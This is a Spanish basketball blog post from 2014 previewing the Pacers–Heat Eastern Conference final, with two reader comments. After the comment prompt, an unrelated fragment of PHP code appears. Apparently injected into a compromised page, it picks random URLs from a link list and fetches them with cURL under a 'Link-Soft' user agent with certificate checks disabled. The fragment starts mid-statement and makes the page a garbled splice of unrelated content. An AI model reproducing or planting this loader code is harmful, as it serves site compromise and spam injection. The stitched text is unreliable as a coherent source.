Previa Indiana Pacers vs Miami Heat

18 de May de 2014 por TheDeerHunter

Final prevista en la conferencia Este. Repetición de la anterior y todo un clásico en los últimos años.
Tras los apuros que hicieron pasar a los Heat el curso pasado y viendo la fortaleza con la que comenzaban éste los Pacers pronto se convertían en la gran esperanza para evitar el threepeat. En algún momento de la campaña, habiendo abierto hueco en la clasificación y con alguna convincente victoria ante los campeones en su haber llegamos incluso a creer que podían ser superiores. Candidatos serios al anillo. Después llegó uno de los colapsos más increíbles que hayamos visto su cotización en las apuestas ha bajado mucho. Llegó a peligrar la ventaja campo y llegan vivos a este momento casi de milagro. Sufrimiento máximo ante los Hawks de las 38 victorias e importantes apuros ante Wizards. Los Heat por su parte han pasado las dos primeras rondas como una apisonadora. En cualquier caso el pasado cuenta poco en los playoffs.

Dos equipos que se conocen bien. Los Heat han sido los verdugos de los Pacers las dos últimas temporadas. El año pasado lo fueron por mínimos detalles y llegan con un empate a 2 en los enfrentamientos previos. En las dos victorias de Indiana Miami no alcanzó los 90 puntos. No cabe duda de que en condiciones normales tanto la defensa de Vogel como el poderío interior de Indiana les genera muchos problemas a los Heat. No debería sorprender una eliminatoria a 7 partidos.

Llegados a este punto la primera cuestión es recurrente. ¿Cómo afrontan los Pacers esta serie? Las dificultades que han ido sorteando les ha permitido recuperarse a sí mismos, al menos parcialmente. El nivel de exigencia ya no es el mismo que los años anteriores. Una derrota de los Pacers pondría en serio peligro el puesto de trabajo de Frank Vogel. No llegamos a vislumbrar que es lo que ocurriría en Miami en caso contrario.

Claves de la eliminatoria:

– Más que nunca, Hibbert: El inmenso center de Indiana se multiplica cuando juega contra Miami. El año pasado ya obligó a sus rivales a modificar su esquema renunciando al small-ball. Además fue una pesadilla para las penetraciones rivales. Los Pacers no se pueden permitir un Roy Hibbert al nivel que le hemos visto en algunas fases de esta postemporada. Los Pacers deberían arrasar bajo tableros.

– La hora de la verdad, George: Si Paul George  pretende mirar a la cara a las grandes espadas de esta liga no hay mejor ocasión que ésta. Apasionante duelo contra LeBron James. Su defensa ya fue muy buena el año pasado, pero ahora se le exije un paso más. Toca demostrar si los Pacers acertaron eligiéndole como jugador franquicia.

– Examen final a las rodillas de Wade: Estos playoffs han sido demasiado plácidos para Wade. No ha tenido grandes pares en frente como para sufrir. Lance Stephenson ha jugado bastante mal hasta la fecha, pero se trata de un jugador muy físico que sabe que los Heat podrían tener un punto débil en los problemas físicos de Flash.

– La carga de partidos: 13 partidos disputados por los Pacers frente a 9 de los Heat. Sobrecarga de minutos de los hombres importantes amarillos. Una de las claves podría ser el uso de la teórica superior segunda unidad de Indiana, pero Vogel no la ha tenido demasiado en cuenta en las series previas.

Pronóstico: 2-4 Miami. Los Heat son los favoritos mientras no se demuestre lo contrario.

Comenta

2 comentarios a esta entrada

  1. rumbero dice:
    #1

    Pues al menos hoy Indiana está en modo diciembre. Todos los titulares por encima de los 12 puntos y Hibbert haciéndose muy grande. Es enseñarles una camiseta de los Heat y estos tios se ponen las pilas

      Citar

  2. Jose Luis dice:
    #2

    Los Pacers se transforman frente al Heat.

    Teniendo a Hibbert atrás los perimetrales pueden pegarse, y con esto defienden las mayores fortalezas del Heat: los tiros en el aro y los triples.

    Superan los 100 puntos y no ha acabado el partido, Pacers +14 ahora, 2 minutos del final.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>